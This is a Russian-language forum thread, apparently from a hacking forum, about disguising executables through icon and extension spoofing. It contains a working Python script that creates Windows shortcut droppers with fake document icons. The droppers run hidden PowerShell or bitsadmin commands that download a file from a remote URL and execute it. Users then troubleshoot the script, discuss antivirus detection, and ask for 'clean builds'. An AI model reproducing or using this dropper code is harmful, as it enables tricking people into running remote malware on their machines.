This is a sample guest message. Register a free account today to become a member! Once signed in, you'll be able to participate on this site by adding your own topics and posts, as well as connect with other members through your own private inbox!
Да в софте есть все иконки всех документов.
Ну а при чем тут размер ты же написал про расширение этот способ работал в 2014г вот моё видео об этом.
А можно к паке значок припездярить и запуфить .exe и будет бинго
{30590066-98b5-11cf-bb82-00aa00bdce0b}
{09FD2EFF-5669-11D3-B65F-00C04F8EF32D}
{18A06B6B-2F3F-4e2b-A611-52BE631B2D22}
{1B261B22-AC6A-4E68-A870-AB5080E8687B}
{1CDC7D25-5AA3-4DC4-8E0C-91524280F806}
{25336920-03F9-11cf-8FD0-00AA00686F13}
{48123BC4-99D9-11D1-A6B3-00C04FD91555}
{73FDDC80-AEA9-101A-98A7-00AA00374959}А в какой версии winrar это работало? И работает ли сейчас?
#!/usr/bin/python3
# -*- coding: utf-8 -*-
__all__ = ['get_available_payloads', 'generate_exploit_shortcut']
# Import modules
from os import path
from winshell import desktop, shortcut
# Target DLL paths
dll = dict(
imageres='%SystemRoot%\\system32\\imageres.dll',
shell32='%SystemRoot%\\system32\\shell32.dll',
wmploc='%SystemRoot%\\system32\\wmploc.dll',
winrar='%ProgramFiles%\\WinRAR\\WinRAR.exe',
office='%ProgramFiles%\\Microsoft Office\\root\\Office16\\',
adobe='%ProgramFiles%\\Adobe\\Acrobat DC\\Acrobat\\Acrobat.exe'
)
# Available icons
icons = {
'xls': (dll['office'] + 'EXCEL.EXE', 0),
'doc': (dll['office'] + 'WINWORD.EXE', 0),
'ppt': (dll['office'] + 'PPTICO.EXE', 0),
'rar': (dll['winrar'], 0),
'zip': (dll['winrar'], 0),
'mp3': (dll['wmploc'], 49),
'avi': (dll['wmploc'], 48),
'png': (dll['imageres'], 67),
'jpg': (dll['imageres'], 67),
'txt': (dll['imageres'], 97),
'pdf': (dll['adobe'], 1),
'file': (dll['imageres'], 2),
'folder': (dll['shell32'], 4),
}
techniques = {
'powershell': '%SystemRoot%\\System32\\WindowsPowerShell\\v1.0\\powershell.exe -w hidden iwr -Uri {target_url} -OutFile $env:TEMP\\{output_name};Start-Process $env:TEMP\\{output_name}',
'bitsadmin': "bitsadmin /transfer Update /download /priority FOREGROUND {target_url} %temp%\\{output_name}' & start %temp%\\{output_name}'"
}
def get_available_payloads() -> list[str]:
'''
Get list of available file extensions
'''
return list(icons.keys())
def generate_exploit_shortcut(url: str, extension: str, description: str = '', technique = 'powershell') -> str:
'''
Generate shortcut dropper
target_url = 'https://ryara.net/putty-url/download/0.78/x86_64/putty.exe'
generate_exploit_shortcut(target_url, 'txt')
'''
assert extension in icons, 'Unknown extension was specified'
savePath = path.join(desktop(), f'Payload.{extension}.lnk')
with shortcut(savePath) as link:
link.path = r'%comspec%'
link.description = description
link.icon_location = icons[extension]
link.arguments = '/C ' + techniques[technique].format(
target_url=url,
output_name=path.basename(url)
)
return savePathБлагодарю за ответ, но почему то ваш код ничего не создал. С Python я на вы, по этому просто скопировал вставил, но ничего не произошло, наверное я что то сделал ни так.
для начала pip install winshell
Благодарю за исправление, ярлык создал, но недочёт с архивом остался. Я Касперский такой ярлык блочит, говорит вирус)))
Если не затруднит, дайте ссылочку где почитать об этом методе.
я думал если с размером такое было, то и с названием может быть получится
мне тоже интересно кто может делать чистые билды со спуфом расширений, кто может пишите плиз в личку.
threads/103450/
